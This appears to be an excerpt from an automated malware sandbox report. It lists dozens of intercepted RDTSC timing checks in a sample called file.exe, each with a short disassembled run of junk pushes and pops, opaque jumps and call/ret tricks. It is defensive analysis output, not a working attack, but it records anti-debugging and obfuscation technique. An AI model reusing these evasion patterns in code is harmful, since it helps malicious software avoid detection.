                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6E52 second address: 5B6ECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F865CD192E6h 0x00000009 popad 0x0000000a pop edx 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jno 00007F865CD192E4h 0x00000015 mov eax, dword ptr [eax] 0x00000017 jo 00007F865CD192DEh 0x0000001d jbe 00007F865CD192D8h 0x00000023 push eax 0x00000024 pop eax 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 jo 00007F865CD192DEh 0x0000002f jp 00007F865CD192D8h 0x00000035 push ebx 0x00000036 pop ebx 0x00000037 pop eax 0x00000038 mov edi, dword ptr [ebp+122D2AD0h] 0x0000003e lea ebx, dword ptr [ebp+1245BB60h] 0x00000044 jo 00007F865CD192D9h 0x0000004a mov si, ax 0x0000004d xchg eax, ebx 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F865CD192DCh 0x00000056 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6F95 second address: 5B6F99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6F99 second address: 5B6F9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6F9D second address: 5B6FEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 jmp 00007F865D1C5553h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push esi 0x00000012 pushad 0x00000013 jl 00007F865D1C5546h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c pop esi 0x0000001d mov eax, dword ptr [eax] 0x0000001f jmp 00007F865D1C5555h 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b jnc 00007F865D1C5546h 0x00000031 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6FEC second address: 5B70AC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 je 00007F865CD192D6h 0x0000000d pop edx 0x0000000e popad 0x0000000f pop eax 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007F865CD192D8h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a mov dword ptr [ebp+122D22B3h], eax 0x00000030 push 00000003h 0x00000032 jg 00007F865CD192D8h 0x00000038 push 00000000h 0x0000003a jmp 00007F865CD192E4h 0x0000003f push 00000003h 0x00000041 jmp 00007F865CD192E3h 0x00000046 push ecx 0x00000047 sbb edx, 776A82E0h 0x0000004d pop edi 0x0000004e push 824EAEDFh 0x00000053 jmp 00007F865CD192DDh 0x00000058 xor dword ptr [esp], 424EAEDFh 0x0000005f jmp 00007F865CD192E6h 0x00000064 lea ebx, dword ptr [ebp+1245BB6Bh] 0x0000006a or edx, dword ptr [ebp+122D2904h] 0x00000070 xchg eax, ebx 0x00000071 push eax 0x00000072 push edx 0x00000073 jng 00007F865CD192DCh 0x00000079 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D58D2 second address: 5D58E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jmp 00007F865D1C554Ch 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D58E5 second address: 5D58EC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D58EC second address: 5D58F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D58F7 second address: 5D58FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D58FB second address: 5D5901 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D5BD9 second address: 5D5BDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D5BDD second address: 5D5BE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D5CF5 second address: 5D5CF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D5CF9 second address: 5D5D05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D6143 second address: 5D614C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D614C second address: 5D6159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D62CC second address: 5D62D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D62D2 second address: 5D62D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D62D6 second address: 5D62F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865CD192E2h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D6486 second address: 5D648A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D648A second address: 5D648E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D65E5 second address: 5D6601 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F865D1C5557h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D675C second address: 5D6762 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D6762 second address: 5D6766 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CE665 second address: 5CE681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F865CD192E5h 0x0000000b popad 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CE681 second address: 5CE6A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C5554h 0x00000007 jg 00007F865D1C5548h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D6A10 second address: 5D6A1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F865CD192D6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D6A1A second address: 5D6A20 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D6A20 second address: 5D6A26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D6A26 second address: 5D6A2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D72F5 second address: 5D72F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D72F9 second address: 5D7303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D7303 second address: 5D7307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D7307 second address: 5D7356 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F865D1C5546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007F865D1C554Dh 0x00000014 jmp 00007F865D1C5552h 0x00000019 jmp 00007F865D1C5558h 0x0000001e popad 0x0000001f jne 00007F865D1C554Ch 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D74B8 second address: 5D74D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F865CD192E6h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DA75D second address: 5DA761 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A008B second address: 5A008F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59E5B1 second address: 59E5B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59E5B7 second address: 59E5BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59E5BB second address: 59E5BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E19F7 second address: 5E19FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E07E8 second address: 5E07F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007F865D1C5546h 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E20C8 second address: 5E20CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E56D3 second address: 5E56DD instructions: 0x00000000 rdtsc 0x00000002 jl 00007F865D1C554Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E56DD second address: 5E56E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E56E7 second address: 5E56EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E4DFA second address: 5E4E2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F865CD192DEh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F865CD192E7h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E4E2A second address: 5E4E2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E4F64 second address: 5E4F68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E4F68 second address: 5E4F6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E53A3 second address: 5E53D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F865CD192E5h 0x00000009 popad 0x0000000a jne 00007F865CD192D8h 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jne 00007F865CD192D6h 0x00000019 pop edx 0x0000001a popad 0x0000001b pushad 0x0000001c jnl 00007F865CD192DCh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E552B second address: 5E554B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C5552h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007F865D1C555Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E7331 second address: 5E7335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E73E2 second address: 5E73F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 je 00007F865D1C554Eh 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E73F4 second address: 5E749E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 jp 00007F865CD192E2h 0x0000000f mov eax, dword ptr [eax] 0x00000011 js 00007F865CD192E4h 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b pushad 0x0000001c pushad 0x0000001d jmp 00007F865CD192E8h 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 jmp 00007F865CD192DEh 0x0000002a popad 0x0000002b pop eax 0x0000002c push 00000000h 0x0000002e push esi 0x0000002f call 00007F865CD192D8h 0x00000034 pop esi 0x00000035 mov dword ptr [esp+04h], esi 0x00000039 add dword ptr [esp+04h], 00000018h 0x00000041 inc esi 0x00000042 push esi 0x00000043 ret 0x00000044 pop esi 0x00000045 ret 0x00000046 jmp 00007F865CD192E4h 0x0000004b mov edi, 3108C05Eh 0x00000050 push 12AD7E26h 0x00000055 push eax 0x00000056 push edx 0x00000057 jnc 00007F865CD192D8h 0x0000005d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E780D second address: 5E7811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E7811 second address: 5E7815 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E7902 second address: 5E7908 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E7908 second address: 5E7912 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F865CD192D6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E7912 second address: 5E7916 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E85CF second address: 5E85D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F865CD192D6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E86C5 second address: 5E86CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E86CB second address: 5E86CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E86CF second address: 5E8722 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C5551h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F865D1C5548h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 xor dword ptr [ebp+12476D3Ah], ecx 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 jnc 00007F865D1C5546h 0x00000036 jnp 00007F865D1C5546h 0x0000003c popad 0x0000003d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E8C02 second address: 5E8C6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F865CD192E6h 0x00000009 popad 0x0000000a nop 0x0000000b mov edi, dword ptr [ebp+122D245Ah] 0x00000011 push 00000000h 0x00000013 mov esi, dword ptr [ebp+122D57D3h] 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ebx 0x0000001e call 00007F865CD192D8h 0x00000023 pop ebx 0x00000024 mov dword ptr [esp+04h], ebx 0x00000028 add dword ptr [esp+04h], 0000001Dh 0x00000030 inc ebx 0x00000031 push ebx 0x00000032 ret 0x00000033 pop ebx 0x00000034 ret 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push edx 0x00000039 jmp 00007F865CD192E3h 0x0000003e pop edx 0x0000003f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E9604 second address: 5E9615 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F865D1C5546h 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EBA55 second address: 5EBA5A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EBA5A second address: 5EBA70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007F865D1C554Ch 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EBA70 second address: 5EBA77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EBB09 second address: 5EBB0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EBB0F second address: 5EBB18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EBB18 second address: 5EBB1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC519 second address: 5EC523 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F865CD192D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED02E second address: 5ED034 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED034 second address: 5ED08C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865CD192E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov edi, dword ptr [ebp+122D2C60h] 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007F865CD192D8h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 00000019h 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+122D1967h], ebx 0x00000038 xchg eax, ebx 0x00000039 pushad 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ECDDE second address: 5ECDF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jc 00007F865D1C5546h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007F865D1C554Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED952 second address: 5ED95C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F865CD192D6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EDB8D second address: 5EDB92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EDB92 second address: 5EDBA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F865CD192DEh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EDBA4 second address: 5EDC22 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F865D1C5546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+122D1959h], edx 0x00000015 mov si, di 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007F865D1C5548h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 0000001Bh 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push esi 0x00000039 call 00007F865D1C5548h 0x0000003e pop esi 0x0000003f mov dword ptr [esp+04h], esi 0x00000043 add dword ptr [esp+04h], 00000015h 0x0000004b inc esi 0x0000004c push esi 0x0000004d ret 0x0000004e pop esi 0x0000004f ret 0x00000050 or dword ptr [ebp+122D2FDEh], edx 0x00000056 xchg eax, ebx 0x00000057 jmp 00007F865D1C5555h 0x0000005c push eax 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 popad 0x00000062 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F22A6 second address: 5F22AC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F3F71 second address: 5F3FA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C554Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F865D1C5556h 0x00000010 jo 00007F865D1C554Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F3FA4 second address: 5F3FEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 jg 00007F865CD192DCh 0x0000000c sub dword ptr [ebp+1247F94Ch], edi 0x00000012 sub dword ptr [ebp+122D2E74h], edi 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007F865CD192D8h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 00000014h 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 mov bx, 4098h 0x00000038 push 00000000h 0x0000003a push esi 0x0000003b mov edi, dword ptr [ebp+122D26C9h] 0x00000041 pop ebx 0x00000042 push eax 0x00000043 push ecx 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
